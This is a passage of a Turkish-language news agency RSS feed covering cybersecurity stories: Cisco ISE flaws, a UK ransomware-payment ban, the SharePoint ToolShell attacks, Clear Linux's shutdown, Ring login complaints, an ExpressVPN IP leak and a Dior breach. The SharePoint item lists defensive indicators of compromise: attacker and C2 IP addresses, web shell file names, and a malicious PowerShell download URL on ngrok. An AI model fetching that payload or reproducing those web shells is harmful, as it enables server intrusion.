<p data-start="1790" data-end="1994"><strong data-start="1790" data-end="1809">CVE-2025-20337:</strong> Cisco ISE ve ISE-PIC sistemlerinde yetersiz veri doğrulama nedeniyle API istekleri üzerinden uzaktan kod çalıştırma açığı.<br data-start="1932" data-end="1935"><em data-start="1937" data-end="1959">Düzeltilen sürümler:</em> ISE 3.3 Patch 7 ve ISE 3.4 Patch 2</p>
</li>
</ul>
<p data-start="1996" data-end="2150">Üç açık da maksimum risk seviyesinde değerlendirilirken (CVSS skoru: <strong data-start="2065" data-end="2073">10.0</strong>), kimlik doğrulama gerektirmemeleri nedeniyle özellikle yüksek risk taşıyor.</p>
<p data-start="2152" data-end="2397"><strong data-start="2152" data-end="2191">Yamaların önemi ve önerilen adımlar</strong><br data-start="2191" data-end="2194">Cisco, söz konusu açıklar için geçici çözüm (workaround) bulunmadığını ve yalnızca yamaların uygulanmasının etkili olduğunu vurguladı. Güvenliğe ilişkin önerilen güncelleme adımları şu şekilde sıralandı:</p>
<ul data-start="2399" data-end="2628">
<li data-start="2399" data-end="2462">
<p data-start="2401" data-end="2462"><strong data-start="2401" data-end="2412">ISE 3.3</strong> kullanıcıları: <strong data-start="2428" data-end="2439">Patch 7</strong> sürümüne yükseltmeli</p>
</li>
<li data-start="2463" data-end="2526">
<p data-start="2465" data-end="2526"><strong data-start="2465" data-end="2476">ISE 3.4</strong> kullanıcıları: <strong data-start="2492" data-end="2503">Patch 2</strong> sürümüne yükseltmeli</p>
</li>
<li data-start="2527" data-end="2628">
<p data-start="2529" data-end="2628"><strong data-start="2529" data-end="2564">ISE 3.2 veya daha eski sürümler</strong>: Bu açıklardan etkilenmediği için herhangi bir işlem gerekmiyor</p>
</li>
</ul>
<p data-start="2630" data-end="2735">Şirket, yamaların uygulanmasında gecikilmesinin sistemlere dışarıdan sızma riskini artıracağını belirtti.</p>
<p data-start="2737" data-end="2913"><strong data-start="2737" data-end="2749"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Birleşik Krallık kamu kurumlarına fidye ödemesini yasaklıyor: Ransomware tehdidine karşı yeni yasa gündemde</title>
<link>https://www.ajansexpres.com.tr/birlesik-krallik-kamu-kurumlarina-fidye-oedemesini-yasakliyor-ransomware-tehdidine-karsi-yeni-yasa-gundemde</link>
<guid>https://www.ajansexpres.com.tr/birlesik-krallik-kamu-kurumlarina-fidye-oedemesini-yasakliyor-ransomware-tehdidine-karsi-yeni-yasa-gundemde</guid>
<description><![CDATA[ Birleşik Krallık hükümeti, yerel yönetimler, okullar ve NHS dahil olmak üzere kamu sektöründeki kuruluşların siber saldırı sonrası fidye ödemesini yasaklamayı planlıyor. Yeni yasa taslağıyla birlikte, fidye yazılımı gruplarının finansal kazanç sağlamasının önüne geçilmesi hedefleniyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d2f797124.webp" length="62348" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:30:15 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Yeni yasa hangi kurumları kapsıyor, fidye ödemeleri neden yasaklanıyor, özel sektör ne şekilde etkilenecek, hangi şirketler son dönemde ransomware saldırısı yaşadı</media:keywords>
<content:encoded><![CDATA[<p>Birleşik Krallık hükümeti, kamu kurumlarının ve kritik altyapı kuruluşlarının fidye yazılımı saldırıları sonrası siber suçlulara ödeme yapmasını yasaklayacak yeni bir yasa üzerinde çalışıyor. Yasa taslağı, <strong data-start="655" data-end="723">yerel yönetimler, devlet okulları ve Ulusal Sağlık Hizmeti (NHS)</strong> gibi kamu kaynaklı kurumları kapsıyor.</p>
<p data-start="764" data-end="1005"><strong data-start="764" data-end="794">Güvenlik Bakanı Dan Jarvis</strong>, yasa ile fidye yazılımı gruplarının iş modelini hedef aldıklarını belirterek, "Değişim Planımızı uygularken, kamu hizmetlerini korumaya ve fidye yazılımlarına karşı birleşik duruş sergilemeye kararlıyız" dedi.</p>
<p data-start="1007" data-end="1324"><strong data-start="1007" data-end="1050">Fidye ödemeleri ciddi riskler doğuruyor</strong><br data-start="1050" data-end="1053">Hükümet açıklamasında, fidye yazılımlarının İngiltere ekonomisine her yıl milyonlarca sterlinlik zarar verdiği belirtildi. Ayrıca bu saldırıların operasyonel aksaklıklardan finansal kayıplara ve hatta hayati risklere kadar birçok ciddi sonuca yol açtığına dikkat çekildi.</p>
<p data-start="1326" data-end="1482">Yeni düzenlemeyle kamu kurumlarının fidye ödeyerek saldırganları finanse etmesi önlenecek ve bu kurumların daha az cazip hedefler haline gelmesi sağlanacak.</p>
<p data-start="1484" data-end="1799"><strong data-start="1484" data-end="1533">Özel sektör için bildirim zorunluluğu geliyor</strong><br data-start="1533" data-end="1536">Yasa kapsamına girmeyen özel sektör kuruluşlarının fidye ödemesi yapmadan önce devlete bildirimde bulunması gerekecek. Bu aşamada, ödemenin yaptırımlara tabi siber suç gruplarına gitme riski değerlendirilecek. Bu grupların çoğu Rusya merkezli olarak tanımlanıyor.</p>
<p data-start="1801" data-end="2002">Ayrıca, fidye yazılımı saldırılarına ilişkin <strong data-start="1846" data-end="1874">zorunlu bildirim sistemi</strong> de kurulacak. Bu sistem sayesinde kolluk kuvvetlerinin saldırganları tespit etmesi ve mağdurlara destek sağlaması hedefleniyor.</p>
<p data-start="2004" data-end="2300"><strong data-start="2004" data-end="2053">Kapsamlı bir kamuoyu danışma süreci yürütüldü</strong><br data-start="2053" data-end="2056">Ocak 2025’te başlatılan kamuoyu danışma süreci kapsamında, kamu sektörü ve ulusal altyapı kuruluşlarının fidye ödemelerinin yasaklanması, fidye ödemelerinin caydırılması ve olay bildirimlerinin zorunlu hale getirilmesi gibi adımlar önerilmişti.</p>
<p data-start="2302" data-end="2683"><strong data-start="2302" data-end="2378">Ransomware, İngiltere’de ulusal güvenlik sorunu olarak değerlendiriliyor</strong><br data-start="2378" data-end="2381">Ulusal Siber Güvenlik Merkezi (NCSC) ve Ulusal Suç Ajansı (NCA), fidye yazılımlarını ülkenin karşı karşıya olduğu en büyük siber suç tehdidi olarak tanımlıyor. Son yıllarda <strong data-start="2554" data-end="2561">NHS</strong>, <strong data-start="2563" data-end="2582">British Library</strong>, <strong data-start="2584" data-end="2603">Marks & Spencer</strong>, <strong data-start="2605" data-end="2614">Co-op</strong> ve <strong data-start="2618" data-end="2629">Harrods</strong> gibi önemli kurumlar bu tür saldırıların hedefi oldu.</p>
<p data-start="2685" data-end="2956">Özellikle Nisan 2025’te Marks & Spencer’ın <strong data-start="2728" data-end="2743">DragonForce</strong> isimli fidye yazılımıyla karşılaştığı saldırı sonrası çevrimiçi siparişler durdurulmuş, 1.400 mağazada operasyonlar aksaklığa uğramıştı. Co-op ise güncel ve eski üyelere ait verilerin sızdırıldığını doğrulamıştı.</p>
<p data-start="2958" data-end="3138"><br><strong data-start="2958" data-end="2970"></strong></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Microsoft, SharePoint saldırılarını Çin bağlantılı hacker gruplarına bağladı: ToolShell istismar zinciriyle dünya genelinde onlarca kurum hedef alındı</title>
<link>https://www.ajansexpres.com.tr/microsoft-sharepoint-saldirilarini-cin-baglantili-hacker-gruplarina-bagladi-toolshell-istismar-zinciriyle-dunya-genelinde-onlarca-kurum-hedef-alindi</link>
<guid>https://www.ajansexpres.com.tr/microsoft-sharepoint-saldirilarini-cin-baglantili-hacker-gruplarina-bagladi-toolshell-istismar-zinciriyle-dunya-genelinde-onlarca-kurum-hedef-alindi</guid>
<description><![CDATA[ Microsoft, SharePoint sunucularını hedef alan sıfır gün açıklarının arkasında Çin merkezli devlet destekli hacker gruplarının olduğunu duyurdu. Linen Typhoon, Violet Typhoon ve Storm-2603 kod adlı aktörlerin dahil olduğu saldırılarda, kritik sistemlere yetkisiz erişim sağlanarak kötü amaçlı kodlar çalıştırıldı. ABD, Avrupa ve Asya&#039;daki kamu kurumları ve şirketler hedefte. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d2f2751a9.webp" length="47186" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:30:10 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>ToolShell saldırı zinciri nedir, SharePoint açıkları kimler tarafından kullanılıyor, hangi kurumlar hedef alındı, Microsoft ve CISA hangi önlemleri öneriyor</media:keywords>
<content:encoded><![CDATA[<p><br data-start="577" data-end="580">Microsoft, SharePoint yazılımında tespit edilen sıfır gün güvenlik açıklarının Çin bağlantılı siber tehdit grupları tarafından aktif olarak istismar edildiğini açıkladı. <strong data-start="750" data-end="763">ToolShell</strong> olarak adlandırılan bu saldırı zinciri, dünya çapında onlarca kuruluşun sistemlerine sızılmasına neden oldu.</p>
<p></p>
<p data-start="874" data-end="1160">Microsoft’un Salı günü yayımladığı teknik rapora göre, saldırılar <strong data-start="940" data-end="957">Linen Typhoon</strong> ve <strong data-start="961" data-end="979">Violet Typhoon</strong> isimli iki Çin devlet destekli aktör ile ilişkilendirildi. Ayrıca <strong data-start="1046" data-end="1060">Storm-2603</strong> kod adıyla izlenen bir başka Çin merkezli grubun da aynı güvenlik açıklarını kullandığı doğrulandı.</p>
<p data-start="1162" data-end="1614"><strong data-start="1162" data-end="1227">Hedefler: Kamu kurumları, yazılım şirketleri, telekom sektörü</strong><br data-start="1227" data-end="1230">Hollanda merkezli Eye Security şirketi, saldırıların ilk olarak 7 Temmuz'da tespit edildiğini ve <strong data-start="1327" data-end="1347">en az 54 kurumun</strong> etkilendiğini açıkladı. Bu kurumlar arasında çok uluslu şirketler ve bazı hükümet organları yer alıyor. Check Point tarafından yapılan açıklamada ise saldırıların Kuzey Amerika ve Batı Avrupa’da kamu, telekomünikasyon ve yazılım sektörlerini hedef aldığı belirtildi.</p>
<p data-start="1616" data-end="1965"><strong data-start="1616" data-end="1650">Zafiyet zinciri ve CVE kodları</strong><br data-start="1650" data-end="1653">Söz konusu saldırılar, <strong data-start="1676" data-end="1694">CVE-2025-49704</strong> ve <strong data-start="1698" data-end="1716">CVE-2025-49706</strong> kodlu iki SharePoint açığını istismar ederek başladı. Microsoft, 16 Temmuz’daki <strong data-start="1797" data-end="1826">Yama Salı (Patch Tuesday)</strong> güncellemeleriyle bu açıkları kapattı ve sonrasında yeni tanımlanan açıklar için <strong data-start="1908" data-end="1926">CVE-2025-53770</strong> ve <strong data-start="1930" data-end="1948">CVE-2025-53771</strong> kodlarını verdi.</p>
<p data-start="1967" data-end="2215">Bu açıklar, kimlik doğrulama gerektirmeden saldırganların SharePoint içeriklerine tam erişim sağlamasına ve ağ üzerinden kod yürütmesine olanak tanıyor. Microsoft, SharePoint 2016, 2019 ve Abonelik sürümleri için acil yama güncellemeleri yayımladı.</p>
<p data-start="2217" data-end="2667"><strong data-start="2217" data-end="2266">PoC istismarı yayımlandı, saldırı riski arttı</strong><br data-start="2266" data-end="2269">Microsoft’un yamaları yayımlamasının ardından, <strong data-start="2316" data-end="2334">CVE-2025-53770</strong> için bir <strong data-start="2344" data-end="2401">PoC (kavramsal ispat) kodu GitHub üzerinde paylaşıldı</strong>. Bu durum, daha fazla saldırganın açığı kullanma riskini artırıyor. ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), bu zafiyeti “Bilinen İstismar Edilen Güvenlik Açıkları” listesine ekledi ve tüm federal kurumlara yamaları ivedilikle uygulama talimatı verdi.</p>
<p data-start="2669" data-end="2925"><strong data-start="2669" data-end="2713">ToolShell saldırı zinciri neler içeriyor</strong><br data-start="2713" data-end="2716">CISA'nın açıklamasına göre ToolShell, yetkisiz sistem erişimi sağlayarak dosya sistemleri ve yapılandırmalar dahil olmak üzere tüm SharePoint içeriklerine ulaşılmasına ve komut çalıştırılmasına olanak tanıyor.</p>
<p data-start="2927" data-end="3094">Microsoft ayrıca güvenlik ekiplerinin ağlarında kompromize olmuş SharePoint sunucularını tespit etmesine yardımcı olmak amacıyla aşağıdaki göstergeleri (IOC) paylaştı:</p>
<ul data-start="3096" data-end="3421">
<li data-start="3096" data-end="3228">
<p data-start="3098" data-end="3228"><strong data-start="3098" data-end="3115">IP adresleri:</strong><br data-start="3115" data-end="3118">134.199.202[.]205<br data-start="3137" data-end="3140">104.238.159[.]149<br data-start="3159" data-end="3162">188.130.206[.]168<br data-start="3181" data-end="3184">131.226.2[.]6 (komuta ve kontrol sunucusu)</p>
</li>
<li data-start="3230" data-end="3334">
<p data-start="3232" data-end="3334"><strong data-start="3232" data-end="3256">Web shell dosyaları:</strong><br data-start="3256" data-end="3259"><code data-start="3261" data-end="3278">Spinstall0.aspx</code>, <code data-start="3280" data-end="3296">spinstall.aspx</code>, <code data-start="3298" data-end="3315">spinstall1.aspx</code>, <code data-start="3317" data-end="3334">spinstall2.aspx</code></p>
</li>
<li data-start="3336" data-end="3421">
<p data-start="3338" data-end="3421"><strong data-start="3338" data-end="3376">Kötü amaçlı PowerShell bağlantısı:</strong><br data-start="3376" data-end="3379"><code data-start="3381" data-end="3421">c34718cbb4c6.ngrok-free[.]app/file.ps1</code></p>
</li>
</ul>
<p data-start="3423" data-end="3648"><strong data-start="3423" data-end="3449">Tavsiye edilen adımlar</strong><br data-start="3449" data-end="3452">CISA ve Microsoft, SharePoint sunucularını yerel (on-premise) olarak kullanan tüm kurumlara acilen yamaları uygulama, ağ trafiğini izleme ve sistem güncellemelerini tamamlama çağrısında bulunuyor.</p>
<p data-start="3650" data-end="3823"><strong data-start="3650" data-end="3662"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Intel, Clear Linux işletim sistemini sonlandırdı: Güvenlik yamaları durdu, GitHub deposu arşive alındı</title>
<link>https://www.ajansexpres.com.tr/intel-clear-linux-isletim-sistemini-sonlandirdi-guvenlik-yamalari-durdu-github-deposu-arsive-alindi</link>
<guid>https://www.ajansexpres.com.tr/intel-clear-linux-isletim-sistemini-sonlandirdi-guvenlik-yamalari-durdu-github-deposu-arsive-alindi</guid>
<description><![CDATA[ Intel’in kendi donanımları için yüksek performans odaklı olarak geliştirdiği açık kaynaklı Clear Linux projesi resmen sona erdi. Güncellemelerin ve güvenlik yamalarının durdurulduğu duyurulurken, kullanıcıların vakit kaybetmeden başka dağıtımlara geçmeleri öneriliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d2ebca9f3.webp" length="25434" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:30:03 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Clear Linux projesi neden sonlandırıldı, kullanıcılar ne yapmalı, hangi riskler oluşabilir, Intel Linux katkılarına devam edecek mi</media:keywords>
<content:encoded><![CDATA[<p>Intel, yaklaşık 10 yıldır geliştirmekte olduğu açık kaynaklı işletim sistemi <strong data-start="503" data-end="521">Clear Linux OS</strong> projesinin sona erdiğini duyurdu. Şirket, Clear Linux’un artık güncelleme veya güvenlik yaması almayacağını ve GitHub üzerindeki kaynak kodlarının <strong data-start="669" data-end="696">salt okunur (read-only)</strong> modda arşivlendiğini açıkladı.</p>
<p data-start="729" data-end="981">Clear Linux, Intel donanımlarında yüksek verimlilik sağlamak üzere özel olarak optimize edilen, modüler ve minimalist yapıya sahip bir Linux dağıtımıydı. Özellikle yazılım geliştiriciler, sunucu yöneticileri ve performans tutkunları için tasarlanmıştı.</p>
<p data-start="983" data-end="1304"><strong data-start="983" data-end="1041">Intel’den yapılan açıklamada şu ifadelere yer verildi:</strong><br data-start="1041" data-end="1044">“Bugünden itibaren Intel, Clear Linux OS için herhangi bir güvenlik yaması, güncelleme veya bakım hizmeti sunmayacaktır. Kullanıcıların, güvenlik ve kararlılık açısından aktif olarak sürdürülen başka bir Linux dağıtımına geçiş yapmaları önemle tavsiye edilir.”</p>
<p data-start="1306" data-end="1651"><strong data-start="1306" data-end="1359">Kapanış gerekçesi net değil ancak işaretler belli</strong><br data-start="1359" data-end="1362">Intel, projenin neden sona erdirildiğine dair resmi bir gerekçe paylaşmadı. Ancak, düşük kullanıcı ilgisi, özel paket ve güncelleme sistemi nedeniyle yüksek mühendislik maliyeti ve Intel’in stratejik kaynaklarını daha verimli projelere yöneltme politikası bu kararda etkili olmuş olabilir.</p>
<p data-start="1653" data-end="1846">Clear Linux, başka bir dağıtımdan türetilmediği için bağımsız bir altyapıya sahipti. Bu durum, her bileşenin sıfırdan yönetilmesini gerektiriyor ve önemli mühendislik kaynakları talep ediyordu.</p>
<p data-start="1848" data-end="2137"><strong data-start="1848" data-end="1887">Intel, Linux katkılarını sürdürecek</strong><br data-start="1887" data-end="1890">Intel, Clear Linux projesini sonlandırsa da Linux ekosistemine olan katkılarının süreceğini belirtti. Şirket, Intel donanımları için geliştirilen optimizasyonların, diğer Linux dağıtımlarına ve açık kaynak projelere entegre edileceğini ifade etti.</p>
<p data-start="2139" data-end="2417"><strong data-start="2139" data-end="2179">Kullanıcılar için acil geçiş önerisi</strong><br data-start="2179" data-end="2182">Clear Linux kullananlara, sistemlerinin kısa süre içinde bilinen güvenlik açıklarına karşı savunmasız kalabileceği uyarısı yapıldı. Bu nedenle, kullanıcıların hızlı bir şekilde başka bir aktif Linux dağıtımına geçiş yapması öneriliyor.</p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Ring, şüpheli giriş raporlarına rağmen ihlali reddetti: Hatalı güncelleme, eski cihazları yeni gibi gösterdi</title>
<link>https://www.ajansexpres.com.tr/ring-supheli-giris-raporlarina-ragmen-ihlali-reddetti-hatali-guncelleme-eski-cihazlari-yeni-gibi-goesterdi</link>
<guid>https://www.ajansexpres.com.tr/ring-supheli-giris-raporlarina-ragmen-ihlali-reddetti-hatali-guncelleme-eski-cihazlari-yeni-gibi-goesterdi</guid>
<description><![CDATA[ Amazon’a ait güvenlik kamerası hizmeti Ring, 28 Mayıs’ta kullanıcıların hesaplarında tanımadıkları cihazları ve IP adreslerini görmesine neden olan olayla ilgili ihlâl iddialarını reddetti. Şirket, bunun bir arka uç (backend) güncelleme hatasından kaynaklandığını savunuyor. Ancak kullanıcılar, açıklamadan tatmin olmuş değil. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d2e6729f1.webp" length="29054" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:29:58 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Ring kullanıcıları neden tanımadıkları girişler gördü, bu olay gerçek bir veri ihlali mi, Amazon’un açıklamaları kullanıcıları neden tatmin etmiyor, hesap güvenliği için hangi adımlar atılmalı</media:keywords>
<content:encoded><![CDATA[<p><br data-start="491" data-end="494">Amazon'un sahip olduğu güvenlik kamerası markası <strong data-start="543" data-end="551">Ring</strong>, 28 Mayıs 2025 tarihinde birçok kullanıcının hesaplarında tanımadıkları cihazlara ve konumlara ait girişler görmesi üzerine ihlal şüphesiyle karşı karşıya kaldı. Ancak şirket, yaşananların bir siber saldırı değil, sistemsel bir hata olduğunu iddia ediyor.</p>
<p></p>
<p data-start="809" data-end="1003">Ring’in açıklamasına göre, yaşanan durum bir <strong data-start="854" data-end="878">arka uç güncellemesi</strong> sırasında <strong data-start="889" data-end="907">Control Center</strong> ekranında cihaz bilgilerini ve giriş tarihlerini yanlış gösteren bir yazılım hatasından ibaret.</p>
<p data-start="1005" data-end="1296"><strong data-start="1005" data-end="1059">Şirketin resmi açıklamasında şu ifadeler yer aldı:</strong><br data-start="1059" data-end="1062">“Control Center’da bilgilerin yanlış görüntülenmesine neden olan bir sorun tespit ettik. Bu durum, arka uç sistemde yapılan bir güncellemenin sonucudur. Müşteri hesaplarına yetkisiz erişim olduğuna dair herhangi bir nedenimiz yoktur.”</p>
<p data-start="1298" data-end="1565">Ancak kullanıcılar, açıklamanın tatmin edici olmadığını savunuyor. Özellikle İngiltere, İspanya ve Kanada gibi ülkelerden gelen giriş kayıtlarını ve bilinmeyen cihaz adlarını ekran görüntüleriyle paylaşan kullanıcılar, bunların eski girişler olamayacağını ifade etti.</p>
<p data-start="1567" data-end="1912"><strong data-start="1567" data-end="1613">Kullanıcı tepkileri sosyal medyada büyüyor</strong><br data-start="1613" data-end="1616">Bir kullanıcı, “Ben Derbhille kim bilmiyorum, onun iPhone’u neden benim Ring hesabımda görünüyor?” diyerek Ring’in “sadece bir hata” açıklamasına tepki gösterdi. Başka bir kullanıcı ise, "Hiç gitmediğim İspanya'dan giriş görünüyor. Bu nasıl sadece eski bir oturum olabilir?" ifadelerini kullandı.</p>
<p data-start="1914" data-end="2248"><strong data-start="1914" data-end="1970">Canlı izleme ve MFA şikayetleri endişeleri artırıyor</strong><br data-start="1970" data-end="1973">Bazı kullanıcılar, uygulamada <strong data-start="2003" data-end="2031">canlı izleme (live view)</strong> etkinlikleri görüldüğünü ancak kendilerinin o saatlerde uygulamayı açmadıklarını belirtti. Ayrıca, yeni cihazlar eklendiğinde çok faktörlü kimlik doğrulama (MFA) uyarısı almadıklarını rapor eden kullanıcılar da oldu.</p>
<p data-start="2250" data-end="2582">Amazon, 22 Temmuz’da BleepingComputer’a yaptığı açıklamada tekrar "bu durumun kullanıcıların hesap güvenliğini tehlikeye atan bir ihlal olmadığını" söyledi. Şirket sözcüsü, kullanıcıların daha önce giriş yaptığı cihazlar, paylaşılan hesap erişimleri ve artık kullanılmayan cihazların sistemde görünmeye devam edebileceğini belirtti.</p>
<p data-start="2584" data-end="2905"><strong data-start="2584" data-end="2604">Ring ne öneriyor</strong><br data-start="2604" data-end="2607">Kullanıcılara, Ring uygulamasında <strong data-start="2641" data-end="2687">Control Center > Authorized Client Devices</strong> bölümünden yetkilendirilmiş cihazları kontrol etmeleri, tanımadıkları cihazları kaldırmaları ve hesap şifresini değiştirmeleri önerildi. Ayrıca, iki faktörlü kimlik doğrulamanın (2FA) etkinleştirilmesi tavsiye edildi.</p>
<p data-start="2907" data-end="3116"><strong data-start="2907" data-end="2919"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>ExpressVPN, RDP oturumlarında IP adreslerini sızdıran hatayı düzeltti: Kullanıcılar yeni sürüme geçmeli</title>
<link>https://www.ajansexpres.com.tr/expressvpn-rdp-oturumlarinda-ip-adreslerini-sizdiran-hatayi-duzeltti-kullanicilar-yeni-surume-gecmeli</link>
<guid>https://www.ajansexpres.com.tr/expressvpn-rdp-oturumlarinda-ip-adreslerini-sizdiran-hatayi-duzeltti-kullanicilar-yeni-surume-gecmeli</guid>
<description><![CDATA[ Dünyanın en popüler VPN hizmetlerinden biri olan ExpressVPN, Windows istemcisinde tespit edilen bir hata nedeniyle Uzak Masaüstü Protokolü (RDP) trafiğinin VPN tünelini atlayarak kullanıcıların gerçek IP adreslerini sızdırabildiğini doğruladı. Şirket, güvenlik açığını gideren güncellemeyi Haziran ayında yayımladı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d2e28b19c.webp" length="43002" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:29:54 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>ExpressVPN’deki hata hangi kullanıcıları etkiledi, IP sızıntısı nasıl gerçekleşti, sorun hangi sürümle düzeltildi, şirket gelecekte benzer hataları nasıl önleyecek</media:keywords>
<content:encoded><![CDATA[<p><br data-start="475" data-end="478">ExpressVPN, Windows uygulamasında tespit edilen ve kullanıcıların gerçek IP adreslerinin RDP bağlantıları sırasında sızmasına neden olan bir güvenlik açığını kapattığını duyurdu. VPN servisinin temel işlevlerinden biri olan IP adresini gizleme özelliğini devre dışı bırakan bu hata, özellikle uzak masaüstü bağlantısı kuran kullanıcıları etkiledi.</p>
<p></p>
<p data-start="827" data-end="1129">Açık, 25 Nisan 2025 tarihinde "Adam-X" takma adlı bir güvenlik araştırmacısı tarafından <strong data-start="915" data-end="946">ExpressVPN’in ödül programı</strong> kapsamında rapor edildi. Şirketin açıklamasına göre sorun, dahili testler için kullanılan debug kodlarının yanlışlıkla üretim (production) sürümlerine dâhil edilmesinden kaynaklandı.</p>
<p data-start="1131" data-end="1161"><strong data-start="1131" data-end="1159">Hangi sürümler etkilendi</strong></p>
<ul data-start="1162" data-end="1324">
<li data-start="1162" data-end="1237">
<p data-start="1164" data-end="1237">Hata, <strong data-start="1170" data-end="1205">sürüm 12.97 ile 12.101.0.2-beta</strong> arasındaki yapıları etkiledi.</p>
</li>
<li data-start="1238" data-end="1324">
<p data-start="1240" data-end="1324"><strong data-start="1240" data-end="1252">Düzeltme</strong>, <strong data-start="1254" data-end="1269">12.101.0.45</strong> numaralı sürümle 18 Haziran 2025 tarihinde yayımlandı.</p>
</li>
</ul>
<p data-start="1326" data-end="1601"><strong data-start="1326" data-end="1361">Şirketin açıklaması şu şekilde:</strong><br data-start="1361" data-end="1364">“Bir kullanıcı RDP bağlantısı kurduğunda, bu trafik VPN tünelini atlayarak doğrudan yönlendirilmiş olabilir. Bu durum şifrelemeyi etkilememiş olsa da, bağlantının VPN üzerinden değil doğrudan gerçekleştiği gözlemlenebilir hâle gelmişti.”</p>
<p data-start="1603" data-end="1826">Bu hata, özellikle aynı yerel ağda bulunanlar veya internet servis sağlayıcıları tarafından RDP sunucusuna yapılan bağlantının fark edilmesine neden olabiliyordu. Normalde bu tür bilgiler VPN tüneli içinde gizli kalmalıydı.</p>
<p data-start="1828" data-end="2155"><strong data-start="1828" data-end="1866">Etki sınırlı ancak dikkat edilmeli</strong><br data-start="1866" data-end="1869">ExpressVPN, hatanın yalnızca RDP (port 3389) kullanan kullanıcıları etkilediğini ve bu protokolün genellikle bireysel kullanıcılar yerine kurumsal ya da teknik personel tarafından tercih edildiğini belirtti. Bu nedenle, genel kullanıcı kitlesi açısından riskin düşük olduğu savunuluyor.</p>
<p data-start="2157" data-end="2284">Yine de şirket, tüm Windows kullanıcılarına <strong data-start="2201" data-end="2216">12.101.0.45</strong> sürümüne geçmelerini ve güncellemeleri geciktirmemelerini öneriyor.</p>
<p data-start="2286" data-end="2469"><strong data-start="2286" data-end="2312">Yeni önlemler alınacak</strong><br data-start="2312" data-end="2315">ExpressVPN, benzer sorunların tekrar yaşanmaması için üretim sürecindeki otomasyon kontrollerini ve geliştirme test süreçlerini güçlendireceğini bildirdi.</p>
<p data-start="2471" data-end="2646">Şirket, geçen yıl da <strong data-start="2492" data-end="2562">Windows istemcisindeki split tunneling özelliğinde DNS sızıntısına</strong> yol açan başka bir sorun nedeniyle geçici olarak bu özelliği devre dışı bırakmıştı.</p>
<p data-start="2648" data-end="2828"><strong data-start="2648" data-end="2660"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Dior ABD&amp;apos;deki Müşterilerine Veri İhlali Bildirimi Göndermeye Başladı</title>
<link>https://www.ajansexpres.com.tr/dior-abddeki-musterilerine-veri-ihlali-bildirimi-goendermeye-basladi</link>
<guid>https://www.ajansexpres.com.tr/dior-abddeki-musterilerine-veri-ihlali-bildirimi-goendermeye-basladi</guid>
<description><![CDATA[ Fransız lüks moda markası Dior, Ocak ayında yaşanan ve ancak Mayıs ayında fark edilen siber saldırı sonrası, ABD&#039;deki müşterilerinin kişisel bilgilerinin sızdırıldığını doğruladı. Şirket, mağdur kullanıcılar için 24 aylık kimlik koruma hizmeti sunuyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202507/image_870x580_6881d2dedf077.webp" length="43376" type="image/jpeg"/>
<pubDate>Thu, 24 Jul 2025 09:29:50 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Dior veri ihlalinden kimler etkilendi, hangi kişisel bilgiler sızdırıldı, ShinyHunters saldırısı hangi markaları hedef aldı, kimlik koruma hizmeti nasıl alınacak</media:keywords>
<content:encoded><![CDATA[<p data-start="355" data-end="594">Fransız lüks moda evi Dior, 26 Ocak 2025 tarihinde gerçekleşen ancak 7 Mayıs 2025'te tespit edilen bir siber güvenlik ihlalinin ardından, ABD'deki müşterilerine yönelik veri sızıntısı bildirimlerini göndermeye başladı.</p>
<p data-start="596" data-end="882">Dior tarafından gönderilen bilgilendirme mektuplarında, saldırının şirketin müşteri bilgilerini barındıran bir veritabanına yönelik olduğu ifade edildi. Yapılan iç inceleme sonucunda, yetkisiz bir kişinin veritabanına erişim sağladığı ve bazı kişisel bilgileri ele geçirdiği belirtildi.</p>
<p data-start="884" data-end="950">Sızdırılan bilgiler arasında şu verilerin yer aldığı bildirildi:</p>
<ul data-start="951" data-end="1125">
<li data-start="951" data-end="961">
<p data-start="953" data-end="961">Tam ad</p>
</li>
<li data-start="962" data-end="984">
<p data-start="964" data-end="984">İletişim bilgileri</p>
</li>
<li data-start="985" data-end="1003">
<p data-start="987" data-end="1003">Fiziksel adres</p>
</li>
<li data-start="1004" data-end="1020">
<p data-start="1006" data-end="1020">Doğum tarihi</p>
</li>
<li data-start="1021" data-end="1078">
<p data-start="1023" data-end="1078">Pasaport veya resmi kimlik numarası (bazı durumlarda)</p>
</li>
<li data-start="1079" data-end="1125">
<p data-start="1081" data-end="1125">Sosyal güvenlik numarası (bazı durumlarda)</p>
</li>
</ul>
